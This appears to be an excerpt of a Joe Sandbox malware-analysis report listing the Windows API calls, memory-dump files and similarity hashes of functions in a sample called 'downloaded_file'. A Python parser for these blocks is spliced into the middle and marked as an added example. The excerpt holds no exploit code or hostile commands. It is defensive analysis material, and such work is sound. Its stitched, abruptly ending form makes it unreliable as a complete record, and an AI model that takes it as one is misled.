                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 3098330729-0
                                                                                                            • Opcode ID: e9fc183e28e18d4458a5def7834781249d5c243206f0ed4990802c86b9dfa5ca
                                                                                                            • Instruction ID: 79b18990b65be0ac6e5fc5bf050cfd8dcf6af3dcd03b2582e294a2269ddecdc4
                                                                                                            • Opcode Fuzzy Hash: e9fc183e28e18d4458a5def7834781249d5c243206f0ed4990802c86b9dfa5ca
                                                                                                            • Instruction Fuzzy Hash: 4411CC75910308FFDB0ADFA8E989B9E7BB9FB4C301F108598F905A7250D6349A44DF54
                                                                                                            APIs
                                                                                                              • Part of subcall function 0031EBC0: LocalAlloc.KERNEL32(00000040,00000FA0), ref: 0031EC09
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0031E3F8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocFreeLocalVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3333721195-0
                                                                                                            • Opcode ID: 8bd307a9b38c5b85456f17132e8a52bd6d8ff148ef5e6e9a610a22087e04736f
                                                                                                            • Instruction ID: 00330d7afea5f4770e45def9a3cad1d4185266bde5497278e4dc454d653984cb
                                                                                                            • Opcode Fuzzy Hash: 8bd307a9b38c5b85456f17132e8a52bd6d8ff148ef5e6e9a610a22087e04736f
                                                                                                            • Instruction Fuzzy Hash: 7391B074E00209DFCB19CF98C884AEDBBB6FF88304F248559E816AB345D735A992CF50
                                                                                                            APIs
                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0032C277
                                                                                                            • __isleadbyte_l.LIBCMT ref: 0032C2AA
                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,00000000,00000000,?,?,?,?,?,00000000), ref: 0032C2DB
                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,00000000,00000000,?,?,?,?,?,00000000), ref: 0032C349
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                            • String ID:
                                                                                                            • API String ID: 3058430110-0
                                                                                                            • Opcode ID: ac608b9c5e819997940b4692ddfeafac0f1d5271f1a8f9a7530ba9b4e6ed3aaf
                                                                                                            • Instruction ID: 19caa2ef1e269d3e1472afdffd3ae20119797932a7a0d701681df9da119024b3
                                                                                                            • Opcode Fuzzy Hash: ac608b9c5e819997940b4692ddfeafac0f1d5271f1a8f9a7530ba9b4e6ed3aaf
                                                                                                            • Instruction Fuzzy Hash: 4231E531A24365EFDF22DFA4E8809BD7BA4FF01310F259969E4A59B191DB30DD40DB50
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 00321E06
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00321E2A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321E4C
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321E6E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventObjectSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2857295742-0
                                                                                                            • Opcode ID: 828740abbcdc2bd48f9e0fab50541f78da24f936f286395a2494c3ba112dcb8c
                                                                                                            • Instruction ID: ef6310302ec84da005e74e8c1b51cb18add67ad8d0b3a15051b47aaaf2c3118d
                                                                                                            • Opcode Fuzzy Hash: 828740abbcdc2bd48f9e0fab50541f78da24f936f286395a2494c3ba112dcb8c
                                                                                                            • Instruction Fuzzy Hash: 462135315001049BCB1ECF58E6D9B7DBBB5FB61305F5642AED406AF6E1C7309986CB50
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                            • String ID:
                                                                                                            • API String ID: 3016257755-0
                                                                                                            • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                            • Instruction ID: f330fe63fa06c2a601f3f8f80533939c7e7843ea458fc5782e8606f98275be0a
                                                                                                            • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                            • Instruction Fuzzy Hash: E911093240015ABFCF235E84EC42CEE3F76FB19394B598525FA1859531D636C9B1AF81
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 0031C887
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0031C898
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0031C8A5
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031C8BF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$FreeLocalObjectSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2545295749-0
                                                                                                            • Opcode ID: 8e69c74bc69be313f11f96b9ff3da163a89553dfc9119e461b6b0ae06a223cf7
                                                                                                            • Instruction ID: f7b7b32247aef0e603231933b3317e626c564072a5e7af7d263a8f26a838c93e
                                                                                                            • Opcode Fuzzy Hash: 8e69c74bc69be313f11f96b9ff3da163a89553dfc9119e461b6b0ae06a223cf7
                                                                                                            • Instruction Fuzzy Hash: 0A110C79A10208EFCB09DF94C988A9EBBB9BF48300F208588E9055B350D734EE85DF50
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 003215F6
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 0032163E
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 00321953
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 00321977
                                                                                                            • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 003219A8
                                                                                                            • shutdown.WS2_32(?,00000002), ref: 003219D1
                                                                                                            • closesocket.WS2_32(?), ref: 003219E5
                                                                                                            • CloseHandle.KERNEL32(?), ref: 003219F6
                                                                                                            • shutdown.WS2_32(00000000,00000002), ref: 00321D0F
                                                                                                            • closesocket.WS2_32(00000000), ref: 00321D23
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321D52
                                                                                                            • shutdown.WS2_32(00000000,00000002), ref: 00321D7D
                                                                                                            • closesocket.WS2_32(00000000), ref: 00321D8A
                                                                                                            • LocalFree.KERNEL32(?), ref: 00321D9E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ObjectSingleWait$closesocketshutdown$CloseHandle$EnumEventsFreeLocalNetwork
                                                                                                            • String ID:
                                                                                                            • API String ID: 3044467104-0
                                                                                                            • Opcode ID: 574c165f25d984b0d2131cf348d29847d2aa2fd049e4b96d33f1761896555c88
                                                                                                            • Instruction ID: 26fff9eb01f3ca17af96f7b53e72ddfd58e00815b8c079b01cdde24b11b6217a
                                                                                                            • Opcode Fuzzy Hash: 574c165f25d984b0d2131cf348d29847d2aa2fd049e4b96d33f1761896555c88
                                                                                                            • Instruction Fuzzy Hash: 8C213A78604228CFCB65CF44EA88BE97775BFA8309F2040D9D5CA66290CBB85EC0CF51
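The function blocks above share one fixed layout (an "APIs" list, then "Memory Dump Source", "Joe Sandbox IDA Plugin" and "Similarity" fields with the Opcode ID and fuzzy hashes). As an added example, not code from Joe Sandbox or from this report, the parser below turns that layout into records that can be indexed by Joe Sandbox's API String ID and screened for functions that touch a networking module. The sample text is constructed and abbreviated from the blocks above, the module list in flag_network_functions() is this example's own heuristic, and nothing here is stated by the report.

```python
"""Parse per-function "APIs" blocks from Joe Sandbox report text.

Added example, not code from Joe Sandbox or from the analysed sample. The block
layout is taken from the report text; the sample below is constructed and
abbreviated, and flag_network_functions() is this example's own heuristic.
"""
import re

# Constructed, abbreviated sample in the report's own layout. The trailing
# "Download File" on the Associated line is the page's link residue, kept to
# show that the parser strips it.
SAMPLE = """\
APIs
• SetEvent.KERNEL32(00000000), ref: 00321E06
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00321E2A
• CloseHandle.KERNEL32(00000000), ref: 00321E4C
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: CloseHandle$EventObjectSingleWait
• String ID:
• API String ID: 2857295742-0
• Opcode ID: 828740abbcdc2bd48f9e0fab50541f78da24f936f286395a2494c3ba112dcb8c
• Instruction Fuzzy Hash: 462135315001049BCB1ECF58E6D9B7DBBB5FB61305F5642AED406AF6E1C7309986CB50
APIs
  • Part of subcall function 0031EBC0: LocalAlloc.KERNEL32(00000040,00000FA0), ref: 0031EC09
• WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 003219A8
• shutdown.WS2_32(?,00000002), ref: 003219D1
• closesocket.WS2_32(?), ref: 003219E5
• __isleadbyte_l.LIBCMT ref: 0032C2AA
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
Similarity
• API ID: ObjectSingleWait$closesocketshutdown$CloseHandle$EnumEventsFreeLocalNetwork
• API String ID: 3044467104-0
• Opcode ID: 574c165f25d984b0d2131cf348d29847d2aa2fd049e4b96d33f1761896555c88
• Instruction Fuzzy Hash: 8C213A78604228CFCB65CF44EA88BE97775BFA8309F2040D9D5CA66290CBB85EC0CF51
"""

# "• Name.MODULE(args), ref: ADDR"; the parentheses are absent for CRT
# references such as "__isleadbyte_l.LIBCMT ref: 0032C2AA".
API_RE = re.compile(
    r"^•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[\w:]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")
DUMP_KEYS = ("Source File", "Associated")


def parse_function_blocks(text):
    """Split report text into one record per "APIs" block."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "dumps": [], "fields": {}}
            blocks.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue  # section headers such as "Memory Dump Source"
        m = API_RE.match(line)
        if m:
            cur["apis"].append({
                "name": m.group("name"),
                "module": m.group("module"),
                "args": [a for a in (m.group("args") or "").split(",") if a],
                "ref": m.group("ref"),
                "subcall": m.group("sub") is not None,
            })
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group("key").strip(), m.group("value").strip()
        value = re.sub(r"Download File$", "", value).strip()  # page link residue
        if key in DUMP_KEYS:
            cur["dumps"].append(value.split(",")[0])  # drop ", Offset: ..."
        else:
            cur["fields"][key] = value
    return blocks


def api_modules(block):
    return {a["module"] for a in block["apis"]}


def index_by_api_string_id(blocks):
    """Group Opcode IDs by the report's 'API String ID' (Joe Sandbox's hash of
    the function's API set); equal IDs across samples are candidates for the
    same routine and a cheap pivot when comparing reports."""
    index = {}
    for b in blocks:
        key = b["fields"].get("API String ID")
        if key:
            index.setdefault(key, []).append(b["fields"].get("Opcode ID"))
    return index


def flag_network_functions(blocks, modules=("WS2_32", "WININET", "WINHTTP")):
    """Heuristic (this example's assumption): Opcode IDs of functions that call
    a networking module, a starting point for locating socket/C2 code."""
    return [b["fields"].get("Opcode ID") for b in blocks
            if api_modules(b) & set(modules)]


if __name__ == "__main__":
    parsed = parse_function_blocks(SAMPLE)
    for b in parsed:
        names = ", ".join(a["name"] for a in b["apis"])
        print(b["fields"].get("Opcode ID", "?")[:16], sorted(api_modules(b)), names)
    print("network functions:", flag_network_functions(parsed))
```

To use it on a real report, feed the text of the disassembly section to parse_function_blocks() and pivot on index_by_api_string_id() across several reports; the Opcode ID then identifies the exact function to open in the dump named in "dumps".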
APIs
• WaitForSingleObject.KERNEL32(?,00000000), ref: 0032163E
• WaitForSingleObject.KERNEL32(?,00000000), ref: 00321678
• WaitForMultipleObjects.KERNEL32(00000006,?,00000000,000000FF), ref: 003218CE
• shutdown.WS2_32(00000000,00000002), ref: 00321D0F
• closesocket.WS2_32(00000000), ref: 00321D23
• CloseHandle.KERNEL32(00000000), ref: 00321D52
• shutdown.WS2_32(00000000,00000002), ref: 00321D7D
• closesocket.WS2_32(00000000), ref: 00321D8A
• LocalFree.KERNEL32(?), ref: 00321D9E
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: Wait$ObjectSingleclosesocketshutdown$CloseFreeHandleLocalMultipleObjects
• String ID:
• API String ID: 785092289-0
APIs
• SetEvent.KERNEL32(00000000,?,0031BE5B), ref: 003021F2
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,0031BE5B), ref: 0030220A
• CloseHandle.KERNEL32(00000000,?,0031BE5B), ref: 00302217
• CloseHandle.KERNEL32(00000000,?,0031BE5B), ref: 00302236
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: CloseHandle$EventObjectSingleWait
• String ID:
• API String ID: 2857295742-0
APIs
• SetEvent.KERNEL32(00000000,?,0031BE60), ref: 003042C2
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,0031BE60), ref: 003042DA
• CloseHandle.KERNEL32(00000000,?,0031BE60), ref: 003042E7
• CloseHandle.KERNEL32(00000000,?,0031BE60), ref: 00304306
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: CloseHandle$EventObjectSingleWait
• String ID:
• API String ID: 2857295742-0
APIs
  • Part of subcall function 003239FB: __getptd.LIBCMT ref: 00323A01
  • Part of subcall function 003239FB: __getptd.LIBCMT ref: 00323A11
• __getptd.LIBCMT ref: 0032779A
  • Part of subcall function 003281BE: __getptd_noexit.LIBCMT ref: 003281C1
  • Part of subcall function 003281BE: __amsg_exit.LIBCMT ref: 003281CE
• __getptd.LIBCMT ref: 003277A8
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: __getptd$__amsg_exit__getptd_noexit
• String ID: csm
• API String ID: 803148776-1018135373
APIs
• LocalFree.KERNEL32(00000000), ref: 00319C80
• LocalFree.KERNEL32(00000000), ref: 00319C8A
• CloseHandle.KERNEL32(00000000), ref: 00319C96
• LocalFree.KERNEL32(00000000), ref: 00319CA0
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: FreeLocal$CloseHandle
• String ID:
• API String ID: 2045616094-0
APIs
• LocalFree.KERNEL32(00000000), ref: 00319C80
• LocalFree.KERNEL32(00000000), ref: 00319C8A
• CloseHandle.KERNEL32(00000000), ref: 00319C96
• LocalFree.KERNEL32(00000000), ref: 00319CA0
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: FreeLocal$CloseHandle
• String ID:
• API String ID: 2045616094-0
APIs
• LocalFree.KERNEL32(00000000), ref: 00319C80
• LocalFree.KERNEL32(00000000), ref: 00319C8A
• CloseHandle.KERNEL32(00000000), ref: 00319C96
• LocalFree.KERNEL32(00000000), ref: 00319CA0
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: FreeLocal$CloseHandle
• String ID:
• API String ID: 2045616094-0
APIs
• LocalFree.KERNEL32(00000000), ref: 0031B928
• CloseHandle.KERNEL32(00000000), ref: 0031B93D
• CloseHandle.KERNEL32(00000000), ref: 0031B95D
• CloseHandle.KERNEL32(00000000), ref: 0031B97D
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: CloseHandle$FreeLocal
• String ID:
• API String ID: 2513001865-0
• Opcode ID: b55f5d0e2518992cc42cb05a3185a6f06cdf18857425b133ef561ce6e6c688fe
• Instruction ID: 161d038ea45b5a40a00d60c81492219e6b57a7a3629cd721a36f3bddce13578a
• Opcode Fuzzy Hash: b55f5d0e2518992cc42cb05a3185a6f06cdf18857425b133ef561ce6e6c688fe
• Instruction Fuzzy Hash: 89F0F479500200CBE36BCF64EE8C7AA77BDBB4C305F048119E619562B0C77858C9DF12
APIs
• LocalFree.KERNEL32(00000000), ref: 0031B928
• CloseHandle.KERNEL32(00000000), ref: 0031B93D
• CloseHandle.KERNEL32(00000000), ref: 0031B95D
• CloseHandle.KERNEL32(00000000), ref: 0031B97D
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
Yara matches
Similarity
• API ID: CloseHandle$FreeLocal
• String ID:
• API String ID: 2513001865-0
• Opcode ID: fc22920881615128450a4ee8d98c3438269342eae8da110d2d30ba1b4ceca74b
• Instruction ID: 161d038ea45b5a40a00d60c81492219e6b57a7a3629cd721a36f3bddce13578a
• Opcode Fuzzy Hash: fc22920881615128450a4ee8d98c3438269342eae8da110d2d30ba1b4ceca74b
• Instruction Fuzzy Hash: 89F0F479500200CBE36BCF64EE8C7AA77BDBB4C305F048119E619562B0C77858C9DF12
APIs
• LocalFree.KERNEL32(00000000), ref: 0031B928
• CloseHandle.KERNEL32(00000000), ref: 0031B93D
• CloseHandle.KERNEL32(00000000), ref: 0031B95D
• CloseHandle.KERNEL32(00000000), ref: 0031B97D
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
Yara matches
Similarity
• API ID: CloseHandle$FreeLocal
• String ID:
• API String ID: 2513001865-0
• Opcode ID: 5759ad1838d668018faa53f12a62e60ad99a7daa101e4cd094981103612abe8e
• Instruction ID: 161d038ea45b5a40a00d60c81492219e6b57a7a3629cd721a36f3bddce13578a
• Opcode Fuzzy Hash: 5759ad1838d668018faa53f12a62e60ad99a7daa101e4cd094981103612abe8e
• Instruction Fuzzy Hash: 89F0F479500200CBE36BCF64EE8C7AA77BDBB4C305F048119E619562B0C77858C9DF12
APIs
• LocalFree.KERNEL32(00000000), ref: 0031A140
• LocalFree.KERNEL32(00000000), ref: 0031A14A
• CloseHandle.KERNEL32(00000000), ref: 0031A156
• LocalFree.KERNEL32(00000000), ref: 0031A160
Memory Dump Source
